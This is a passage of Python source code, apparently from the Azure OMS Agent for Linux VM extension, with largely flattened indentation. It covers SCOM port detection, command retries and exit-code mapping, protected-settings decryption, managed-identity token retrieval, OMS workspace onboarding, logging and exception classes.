# Guard against older omsadmin.sh versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
        if exit_code == 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omsadmin_cmd))
return True
        elif exit_code == 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omsadmin_cmd))
return False
def detect_scom_using_omiconfigeditor():
"""
This method assumes that the relevant files exist
Returns True if omiconfigeditor indicates that SCOM port is open
"""
omi_cmd = '{0} httpsport -q {1} < {2}'.format(OMIConfigEditorPath,
SCOMPort, OMIServerConfPath)
exit_code, output = run_get_output(omi_cmd, False, False)
# Guard against older omiconfigeditor versions
if ('illegal option' not in output.lower()
and 'unknown option' not in output.lower()):
        if exit_code == 0:
hutil_log_info('According to {0}, SCOM port is ' \
'open'.format(omi_cmd))
return True
        elif exit_code == 1:
hutil_log_info('According to {0}, SCOM port is not ' \
'open'.format(omi_cmd))
return False
def detect_scom_using_omiserver_conf():
"""
This method assumes that the relevant files exist
Returns True if omiserver.conf indicates that SCOM port is open
"""
with open(OMIServerConfPath, 'r') as omiserver_file:
omiserver_txt = omiserver_file.read()
httpsport_search = r'^[\s]*httpsport[\s]*=(.*)$'
httpsport_re = re.compile(httpsport_search, re.M)
httpsport_matches = httpsport_re.search(omiserver_txt)
if (httpsport_matches is not None and
httpsport_matches.group(1) is not None):
ports = httpsport_matches.group(1)
ports = ports.replace(',', ' ')
ports_list = ports.split(' ')
if str(SCOMPort) in ports_list:
hutil_log_info('SCOM port is listed in ' \
'{0}'.format(OMIServerConfPath))
return True
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
else:
hutil_log_info('SCOM port is not listed in ' \
'{0}'.format(OMIServerConfPath))
return False
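# --- Illustrative sketch (editor's addition): the parser above accepts
# httpsport values given as comma- or space-separated port lists, e.g.
# 'httpsport=1270,5986'. Reduced to its essence:
def _example_httpsport_contains(conf_text, port):
    match = re.search(r'^[\s]*httpsport[\s]*=(.*)$', conf_text, re.M)
    if match is None:
        return False
    ports = match.group(1).replace(',', ' ').split(' ')
    return str(port) in ports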
def run_command_and_log(cmd, check_error = True, log_cmd = True):
"""
Run the provided shell command and log its output, including stdout and
stderr.
The output should not contain any PII, but the command might. In this case,
log_cmd should be set to False.
"""
exit_code, output = run_get_output(cmd, check_error, log_cmd)
if log_cmd:
hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
else:
hutil_log_info('Output: \n{0}'.format(output))
# also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
    # take only the last 500 characters, as the extension output is cut off after that
try:
        if exit_code != 0:
sys.stderr.write(output[-500:])
# For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log
            if exit_code == 17:
if "Failed dependencies:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "waiting for transaction lock" in output or "dpkg: error processing package systemd" in output or "dpkg-deb" in output or "dpkg:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Errors were encountered while processing:" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue while processing triggers in systemd. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "Cannot allocate memory" in output:
# 52 is the exit code for missing dependency
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be insufficient memory for the installation. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 19:
if "rpmdb" in output or "cannot open Packages database" in output or "dpkg (subprocess): cannot set security execution context for maintainer script" in output or "error: dpkg status database is locked by another process" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
elif "libc6 is not installed" in output or "libpam-runtime is not installed" in output or "exited with status 52" in output or "/bin/sh is needed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 33:
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 5:
if "Reason: InvalidWorkspaceKey" in output or "Reason: MissingHeader" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 8:
if "Check the correctness of the workspace ID and shared key" in output:
# Enable failures
# 53 is the exit code for configuration errors
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 53
output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            if exit_code != 0 and exit_code != 52:
if "dpkg:" in output or "dpkg :" in output or "rpmdb:" in output or "rpm.lock" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "conflicts with file from package" in output or "Failed dependencies:" in output or "Please install curl" in output or "is needed by" in output or "check_version_installable" in output or "Error: curl was not installed" in output or "Please install the ctypes package" in output or "gpg is not installed" in output:
# OMI (19) happens to be the first package we install and if we get rpmdb failures, its a system issue
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
if "Permission denied" in output:
# Enable failures
# 52 is the exit code for missing dependency i.e. rpmdb, libc6 or libpam-runtime
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
exit_code = 52
output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
except:
hutil_log_info('Failed to write output to STDERR')
return exit_code, output
def run_command_with_retries(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
If the retry_check returns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code
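# --- Illustrative sketch (editor's addition): a retry_check callable must
# return the triple (should_retry, retry_message, retry_verbosely). A minimal
# example that retries any non-zero exit:
def _example_retry_on_any_failure(exit_code, output):
    if exit_code != 0:
        return True, 'Retrying because the command failed.', False
    return False, '', False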
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
check_error = True, log_cmd = True,
initial_sleep_time = InitialRetrySleepSeconds,
sleep_increase_factor = 1):
"""
Caller provides a method, retry_check, to use to determine if a retry
should be performed. This must be a function with two parameters:
exit_code and output
The final_check can be provided as a method to perform a final check after
retries have been exhausted
Logic used: will retry up to retries times with initial_sleep_time in
between tries
    If the retry_check returns True for retry_verbosely, we will try cmd with
the standard -v verbose flag added
"""
try_count = 0
sleep_time = initial_sleep_time
run_cmd = cmd
run_verbosely = False
while try_count <= retries:
if run_verbosely:
run_cmd = cmd + ' -v'
exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd)
should_retry, retry_message, run_verbosely = retry_check(exit_code,
output)
if not should_retry:
break
try_count += 1
hutil_log_info(retry_message)
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if final_check is not None:
exit_code = final_check(exit_code, output)
return exit_code, output
def is_dpkg_locked(exit_code, output):
"""
If dpkg is locked, the output will contain a message similar to 'dpkg
status database is locked by another process'
"""
if exit_code != 0:
dpkg_locked_search = r'^.*dpkg.+lock.*$'
dpkg_locked_re = re.compile(dpkg_locked_search, re.M)
if dpkg_locked_re.search(output):
return True
return False
def was_curl_found(exit_code, output):
"""
Returns false if exit_code indicates that curl was not installed; this can
occur when package lists need to be updated, or when some archives are
out-of-date
"""
if exit_code == InstallErrorCurlNotInstalled:
return False
return True
def retry_skip(exit_code, output):
"""
Skip retries
"""
return False, '', False
def retry_if_dpkg_locked_or_curl_is_not_found(exit_code, output):
"""
Some commands fail because the package manager is locked (apt-get/dpkg
only); this will allow retries on failing commands.
Sometimes curl's dependencies (i.e. libcurl) are not installed; if this
is the case on a VM with apt-get, 'apt-get -f install' should be run
Sometimes curl is not installed and is also not found in the package list;
if this is the case on a VM with apt-get, update the package list
"""
retry_verbosely = False
dpkg_locked = is_dpkg_locked(exit_code, output)
curl_found = was_curl_found(exit_code, output)
apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
chk_err = False,
log_cmd = False)
if dpkg_locked:
return True, 'Retrying command because package manager is locked.', \
retry_verbosely
elif (not curl_found and apt_get_exit_code == 0 and
('apt-get -f install' in output
or 'Unmet dependencies' in output.lower())):
hutil_log_info('Installing all dependencies of curl:')
run_command_and_log('apt-get -f install')
return True, 'Retrying command because curl and its dependencies ' \
'needed to be installed', retry_verbosely
elif not curl_found and apt_get_exit_code == 0:
hutil_log_info('Updating package lists to make curl available')
run_command_and_log('apt-get update')
return True, 'Retrying command because package lists needed to be ' \
'updated', retry_verbosely
else:
return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
"""
If dpkg is still locked after the retries, we want to return a specific
error code
"""
dpkg_locked = is_dpkg_locked(exit_code, output)
if dpkg_locked:
exit_code = DPKGLockedErrorCode
return exit_code
def retry_onboarding(exit_code, output):
"""
Retry under any of these conditions:
- If the onboarding request returns 403: this may indicate that the agent
GUID and certificate should be re-generated
- If the onboarding request returns a different non-200 code: the OMS
service may be temporarily unavailable
- If the onboarding curl command returns an unaccounted-for error code,
we should retry with verbose logging
"""
retry_verbosely = False
if exit_code == EnableErrorOMSReturned403:
return True, 'Retrying the onboarding command to attempt generating ' \
'a new agent ID and certificate.', retry_verbosely
elif exit_code == EnableErrorOMSReturnedNon200:
return True, 'Retrying; the OMS service may be temporarily ' \
'unavailable.', retry_verbosely
elif exit_code == EnableErrorOnboarding:
return True, 'Retrying with verbose logging.', True
return False, '', False
def raise_if_no_internet(exit_code, output):
"""
Raise the CannotConnectToOMSException exception if the onboarding
script returns the error code to indicate that the OMS service can't be
resolved
"""
if exit_code == EnableErrorResolvingHost:
raise CannotConnectToOMSException
return exit_code
def get_settings():
"""
Retrieve the configuration for this extension operation
"""
global SettingsDict
public_settings = None
protected_settings = None
if HUtilObject is not None:
public_settings = HUtilObject.get_public_settings()
protected_settings = HUtilObject.get_protected_settings()
elif SettingsDict is not None:
public_settings = SettingsDict['public_settings']
protected_settings = SettingsDict['protected_settings']
else:
SettingsDict = {}
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
seq_no = get_latest_seq_no()
settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no))
h_settings = {}
try:
with open(settings_path, 'r') as settings_file:
settings_txt = settings_file.read()
settings = json.loads(settings_txt)
h_settings = settings['runtimeSettings'][0]['handlerSettings']
public_settings = h_settings['publicSettings']
SettingsDict['public_settings'] = public_settings
except:
hutil_log_error('Unable to load handler settings from ' \
'{0}'.format(settings_path))
if ('protectedSettings' in h_settings
and 'protectedSettingsCertThumbprint' in h_settings
and h_settings['protectedSettings'] is not None
and h_settings['protectedSettingsCertThumbprint'] is not None):
encoded_settings = h_settings['protectedSettings']
settings_thumbprint = h_settings['protectedSettingsCertThumbprint']
encoded_cert_path = os.path.join('/var/lib/waagent',
'{0}.crt'.format(
settings_thumbprint))
encoded_key_path = os.path.join('/var/lib/waagent',
'{0}.prv'.format(
settings_thumbprint))
decoded_settings = base64.standard_b64decode(encoded_settings)
decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \
'-inkey {1}'.format(encoded_cert_path,
encoded_key_path)
output = None
try:
session = subprocess.Popen([decrypt_cmd], shell = True,
stdin = subprocess.PIPE,
stderr = subprocess.STDOUT,
stdout = subprocess.PIPE)
output = session.communicate(decoded_settings)
except OSError:
pass
protected_settings_str = output[0] if output is not None else None
if protected_settings_str is None:
log_and_exit('Enable', 1, 'Failed decrypting ' \
'protectedSettings')
protected_settings = ''
try:
protected_settings = json.loads(protected_settings_str)
except:
hutil_log_error('JSON exception decoding protected settings')
SettingsDict['protected_settings'] = protected_settings
return public_settings, protected_settings
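# For reference, a minimal sketch (inferred from the parsing above; values
# are placeholders, not real settings) of the .settings file layout that
# get_settings expects:
#
# {
#     "runtimeSettings": [{
#         "handlerSettings": {
#             "publicSettings": { ... },
#             "protectedSettings": "<base64-encoded encrypted blob>",
#             "protectedSettingsCertThumbprint": "<thumbprint>"
#         }
#     }]
# }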
def update_status_file(operation, exit_code, exit_status, message):
"""
Mimic HandlerUtil method do_status_report in case hutil method is not
available
Write status to status file
"""
handler_env = get_handler_env()
try:
extension_version = str(handler_env['version'])
status_dir = str(handler_env['handlerEnvironment']['statusFolder'])
except:
extension_version = "1.0"
status_dir = os.path.join(os.getcwd(), 'status')
status_txt = [{
"version" : extension_version,
"timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
"status" : {
"name" : "Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux",
"operation" : operation,
"status" : exit_status,
"code" : exit_code,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_json = json.dumps(status_txt)
# Find the most recently changed config file and then use the
# corresponding status file
latest_seq_no = get_latest_seq_no()
status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no))
status_tmp = '{0}.tmp'.format(status_path)
with open(status_tmp, 'w+') as tmp_file:
tmp_file.write(status_json)
os.rename(status_tmp, status_path)
def get_handler_env():
"""
Set and retrieve the contents of HandlerEnvironment.json as JSON
"""
global HandlerEnvironment
if HandlerEnvironment is None:
handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json')
try:
with open(handler_env_path, 'r') as handler_env_file:
handler_env_txt = handler_env_file.read()
handler_env = json.loads(handler_env_txt)
if isinstance(handler_env, list):
handler_env = handler_env[0]
HandlerEnvironment = handler_env
except Exception as e:
waagent_log_error(str(e))
return HandlerEnvironment
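# For reference, a minimal sketch (inferred from the fields read above) of
# the HandlerEnvironment.json layout this helper expects; the real file is
# written by the Azure guest agent:
#
# [{
#     "version": "<extension version>",
#     "handlerEnvironment": {
#         "configFolder": "<path>",
#         "statusFolder": "<path>"
#     }
# }]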
def get_latest_seq_no():
"""
Determine the latest operation settings number to use
"""
global SettingsSequenceNumber
if SettingsSequenceNumber is None:
handler_env = get_handler_env()
try:
config_dir = str(handler_env['handlerEnvironment']['configFolder'])
except:
config_dir = os.path.join(os.getcwd(), 'config')
latest_seq_no = -1
cur_seq_no = -1
latest_time = None
try:
for dir_name, sub_dirs, file_names in os.walk(config_dir):
for file_name in file_names:
file_basename = os.path.basename(file_name)
match = re.match(r'[0-9]{1,10}\.settings', file_basename)
if match is None:
continue
cur_seq_no = int(file_basename.split('.')[0])
file_path = os.path.join(config_dir, file_name)
cur_time = os.path.getmtime(file_path)
if latest_time is None or cur_time > latest_time:
latest_time = cur_time
latest_seq_no = cur_seq_no
except:
pass
if latest_seq_no < 0:
latest_seq_no = 0
SettingsSequenceNumber = latest_seq_no
return SettingsSequenceNumber
def run_get_output(cmd, chk_err = False, log_cmd = True):
"""
Mimic waagent method RunGetOutput in case waagent is not available
Run shell command and return exit code and output
"""
if 'Utils.WAAgentUtil' in sys.modules:
# WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput
# If checking the number of parameters fails, pass 2
try:
sig = inspect.signature(waagent.RunGetOutput)
params = sig.parameters
waagent_params = len(params)
except:
try:
spec = inspect.getargspec(waagent.RunGetOutput)
params = spec.args
waagent_params = len(params)
except:
waagent_params = 2
if waagent_params >= 3:
exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd)
else:
exit_code, output = waagent.RunGetOutput(cmd, chk_err)
else:
try:
output = subprocess.check_output(cmd, stderr = subprocess.STDOUT,
shell = True)
output = output.decode('latin-1')
exit_code = 0
except subprocess.CalledProcessError as e:
exit_code = e.returncode
output = e.output.decode('latin-1')
output = output.encode('utf-8', 'ignore')
# On python 3, encode returns a byte object, so we must decode back to a string
if sys.version_info >= (3,):
output = output.decode()
return exit_code, output.strip()
def get_tenant_id_from_metadata_api(vm_resource_id):
"""
Retrieve the tenant ID by querying the Metadata API with the VM resource ID
Since we have not authenticated, the Metadata API will throw a 401, but
the headers of the 401 response will contain the tenant ID
"""
tenant_id = None
metadata_endpoint = get_metadata_api_endpoint(vm_resource_id)
metadata_request = urllib.request.Request(metadata_endpoint)
try:
# This request should fail with code 401
metadata_response = urllib.request.urlopen(metadata_request)
hutil_log_info('Request to Metadata API did not fail as expected; ' \
'attempting to use headers from response to ' \
'determine Tenant ID')
metadata_headers = metadata_response.headers
except urllib.error.HTTPError as e:
metadata_headers = e.headers
if metadata_headers is not None and 'WWW-Authenticate' in metadata_headers:
auth_header = metadata_headers['WWW-Authenticate']
auth_header_regex = r'authorization_uri=\"https:\/\/login\.windows\.net/(' + GUIDRegex + ')\"'
auth_header_search = re.compile(auth_header_regex)
auth_header_matches = auth_header_search.search(auth_header)
if not auth_header_matches:
raise MetadataAPIException('The WWW-Authenticate header in the ' \
'response does not contain expected ' \
'authorization_uri format')
else:
tenant_id = auth_header_matches.group(1)
else:
raise MetadataAPIException('Expected information from Metadata API ' \
'is not present')
return tenant_id
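# For reference, the WWW-Authenticate header parsed above looks roughly like
# the following (the GUID is an illustrative placeholder):
#
#   Bearer authorization_uri="https://login.windows.net/00000000-0000-0000-0000-000000000000"
#
# so group(1) of the regex is the tenant ID.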
def get_metadata_api_endpoint(vm_resource_id):
"""
Extrapolate Metadata API endpoint from VM Resource ID
Example VM resource ID: /subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup/providers/Microsoft.Compute/virtualMachines/lagalbraOCUb16C
Corresponding example endpoint: https://management.azure.com/subscriptions/306ee7f1-3d0a-4605-9f39-ff253cc02708/resourceGroups/LinuxExtVMResourceGroup?api-version=2016-09-01
"""
# Will match for ARM and Classic VMs, Availability Sets, VM Scale Sets
vm_resource_id_regex = r'^\/subscriptions\/(' + GUIDRegex + r')\/' \
r'resourceGroups\/([^\/]+)\/providers\/Microsoft' \
r'\.(?:Classic){0,1}Compute\/(?:virtualMachines|' \
r'availabilitySets|virtualMachineScaleSets)' \
r'\/[^\/]+$'
vm_resource_id_search = re.compile(vm_resource_id_regex, re.M)
vm_resource_id_matches = vm_resource_id_search.search(vm_resource_id)
if not vm_resource_id_matches:
raise InvalidParameterError('VM Resource ID is invalid')
else:
subscription_id = vm_resource_id_matches.group(1)
resource_group = vm_resource_id_matches.group(2)
metadata_url = 'https://management.azure.com/subscriptions/{0}' \
'/resourceGroups/{1}'.format(subscription_id,
resource_group)
metadata_data = urllib.parse.urlencode({'api-version' : '2016-09-01'})
metadata_endpoint = '{0}?{1}'.format(metadata_url, metadata_data)
return metadata_endpoint
def get_access_token(tenant_id, resource):
"""
Retrieve an OAuth token by sending an OAuth2 token exchange
request to the local URL that the ManagedIdentity extension is
listening to
"""
# Extract the endpoint that the ManagedIdentity extension is listening on
with open(ManagedIdentityExtListeningURLPath, 'r') as listening_file:
listening_settings_txt = listening_file.read()
try:
listening_settings = json.loads(listening_settings_txt)
listening_url = listening_settings['url']
except:
raise ManagedIdentityExtException('Could not extract listening URL ' \
'from settings file')
# Send an OAuth token exchange request
oauth_data = {'authority' : 'https://login.microsoftonline.com/' \
'{0}'.format(tenant_id),
'resource' : resource
}
oauth_request = urllib.request.Request(listening_url + '/oauth2/token',
urllib.parse.urlencode(oauth_data).encode('utf-8'))
oauth_request.add_header('Metadata', 'true')
try:
oauth_response = urllib.request.urlopen(oauth_request)
oauth_response_txt = oauth_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to ManagedIdentity extension listening URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from ManagedIdentity extension: ' \
'{0}'.format(e.read()))
raise ManagedIdentityExtException('Request to listening URL failed ' \
'with HTTPError {0}'.format(e))
except:
raise ManagedIdentityExtException('Unexpected error from request to ' \
'listening URL')
try:
oauth_response_json = json.loads(oauth_response_txt)
except:
raise ManagedIdentityExtException('Error parsing JSON from ' \
'listening URL response')
if (oauth_response_json is not None
and 'access_token' in oauth_response_json):
return oauth_response_json['access_token']
else:
raise ManagedIdentityExtException('Could not retrieve access token ' \
'in the listening URL response')
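# For reference, a sketch of the exchange performed above (values are
# placeholders): the POST body is the urlencoded pair
#   authority=https://login.microsoftonline.com/<tenant_id>&resource=<resource>
# sent with a 'Metadata: true' header to <listening_url>/oauth2/token, and a
# successful response is JSON of the form {"access_token": "<token>", ...}.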
def get_workspace_info_from_oms(vm_resource_id, tenant_id, access_token):
"""
Send a request to the OMS service with the VM information to
determine the workspace the OMSAgent should onboard to
"""
oms_data = {'ResourceId' : vm_resource_id,
'TenantId' : tenant_id,
'JwtToken' : access_token
}
oms_request_json = json.dumps(oms_data)
oms_request = urllib.request.Request(OMSServiceValidationEndpoint)
oms_request.add_header('Content-Type', 'application/json')
retries = 5
initial_sleep_time = AutoManagedWorkspaceCreationSleepSeconds
sleep_increase_factor = 1
try_count = 0
sleep_time = initial_sleep_time
# Workspace may not be provisioned yet; sleep and retry if
# provisioning has been accepted
while try_count <= retries:
try:
oms_response = urllib.request.urlopen(oms_request,
oms_request_json.encode('utf-8'))
oms_response_txt = oms_response.read()
except urllib.error.HTTPError as e:
hutil_log_error('Request to OMS threw HTTPError: {0}'.format(e))
hutil_log_info('Response from OMS: {0}'.format(e.read()))
raise OMSServiceOneClickException('ValidateMachineIdentity ' \
'request returned an error ' \
'HTTP code: {0}'.format(e))
except:
raise OMSServiceOneClickException('Unexpected error from ' \
'ValidateMachineIdentity ' \
'request')
should_retry = retry_get_workspace_info_from_oms(oms_response)
if not should_retry:
# TESTED
break
elif try_count == retries:
# TESTED
hutil_log_error('Retries for ValidateMachineIdentity request ran ' \
'out: required workspace information cannot be ' \
'extracted')
raise OneClickException('Workspace provisioning did not complete ' \
'within the allotted time')
# TESTED
try_count += 1
time.sleep(sleep_time)
sleep_time *= sleep_increase_factor
if not oms_response_txt:
raise OMSServiceOneClickException('Body from ValidateMachineIdentity ' \
'response is empty; required ' \
'workspace information cannot be ' \
'extracted')
try:
oms_response_json = json.loads(oms_response_txt)
except:
raise OMSServiceOneClickException('Error parsing JSON from ' \
'ValidateMachineIdentity response')
if (oms_response_json is not None and 'WorkspaceId' in oms_response_json
and 'WorkspaceKey' in oms_response_json):
return oms_response_json
else:
hutil_log_error('Could not retrieve both workspace ID and key from ' \
'the OMS service response {0}; cannot determine ' \
'workspace ID and key'.format(oms_response_json))
raise OMSServiceOneClickException('Required workspace information ' \
'was not found in the ' \
'ValidateMachineIdentity response')
def retry_get_workspace_info_from_oms(oms_response):
"""
Return True to retry if the response from OMS for the
ValidateMachineIdentity request indicates that the request has
been accepted, but the managed workspace is still being
provisioned
"""
try:
oms_response_http_code = oms_response.getcode()
except:
hutil_log_error('Unable to get HTTP code from OMS response')
return False
if oms_response_http_code in (202, 204, 404):
hutil_log_info('Retrying ValidateMachineIdentity OMS request ' \
'because workspace is still being provisioned; HTTP ' \
'code from OMS is {0}'.format(oms_response_http_code))
return True
else:
hutil_log_info('Workspace is provisioned; HTTP code from OMS is ' \
'{0}'.format(oms_response_http_code))
return False
def init_waagent_logger():
"""
Initialize waagent logger
If waagent has not been imported, catch the exception
"""
try:
waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True)
except Exception as e:
print('Unable to initialize waagent log because of exception ' \
'{0}'.format(e))
def waagent_log_info(message):
"""
Log informational message, being cautious of possibility that waagent may
not be imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Log(message)
else:
print('Info: {0}'.format(message))
def waagent_log_error(message):
"""
Log error message, being cautious of possibility that waagent may not be
imported
"""
if 'Utils.WAAgentUtil' in sys.modules:
waagent.Error(message)
else:
print('Error: {0}'.format(message))
def hutil_log_info(message):
"""
Log informational message, being cautious of possibility that hutil may
not be imported and configured
"""
if HUtilObject is not None:
HUtilObject.log(message)
else:
print('Info: {0}'.format(message))
def hutil_log_error(message):
"""
Log error message, being cautious of possibility that hutil may not be
imported and configured
"""
if HUtilObject is not None:
HUtilObject.error(message)
else:
print('Error: {0}'.format(message))
def log_and_exit(operation, exit_code = 1, message = ''):
"""
Log the exit message and perform the exit
"""
if exit_code == 0:
waagent_log_info(message)
hutil_log_info(message)
exit_status = 'success'
else:
waagent_log_error(message)
hutil_log_error(message)
exit_status = 'failed'
if HUtilObject is not None:
HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code),
message)
else:
update_status_file(operation, str(exit_code), exit_status, message)
sys.exit(exit_code)
# Exceptions
# If these exceptions are expected to be caught by the main method, they
# include an error_code field with an integer with which to exit from main
class OmsAgentForLinuxException(Exception):
"""
Base exception class for all exceptions; as such, its error code is the
basic error code traditionally returned in Linux: 1
"""
error_code = 1
def get_error_message(self, operation):
"""
Return a descriptive error message based on this type of exception
"""
return '{0} failed with exit code {1}'.format(operation,
self.error_code)
class ParameterMissingException(OmsAgentForLinuxException):
"""
There is a missing parameter for the OmsAgentForLinux Extension
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to a missing parameter: {1}'.format(operation,
self)
class InvalidParameterError(OmsAgentForLinuxException):
"""
There is an invalid parameter for the OmsAgentForLinux Extension
ex. Workspace ID does not match GUID regex
"""
error_code = MissingorInvalidParameterErrorCode
def get_error_message(self, operation):
return '{0} failed due to an invalid parameter: {1}'.format(operation,
self)
class UnwantedMultipleConnectionsException(OmsAgentForLinuxException):
"""
This VM is already connected to a different Log Analytics workspace
and stopOnMultipleConnections is set to true
"""
error_code = UnwantedMultipleConnectionsErrorCode
def get_error_message(self, operation):
return '{0} failed due to multiple connections: {1}'.format(operation,
self)
class CannotConnectToOMSException(OmsAgentForLinuxException):
"""
The OMSAgent cannot connect to the OMS service
"""
error_code = CannotConnectToOMSErrorCode # error code to indicate no internet access
def get_error_message(self, operation):
return 'The agent could not connect to the Microsoft Operations ' \
'Management Suite service. Please check that the system ' \
'either has Internet access, or that a valid HTTP proxy has ' \
'been configured for the agent. Please also check the ' \
'correctness of the workspace ID.'
class OneClickException(OmsAgentForLinuxException):
"""
A generic exception for OneClick-related issues
"""
error_code = OneClickErrorCode
def get_error_message(self, operation):
return 'Encountered an issue related to the OneClick scenario: ' \
'{0}'.format(self)
class ManagedIdentityExtMissingException(OneClickException):
"""
This extension being present is required for the OneClick scenario
"""
error_code = ManagedIdentityExtMissingErrorCode
def get_error_message(self, operation):
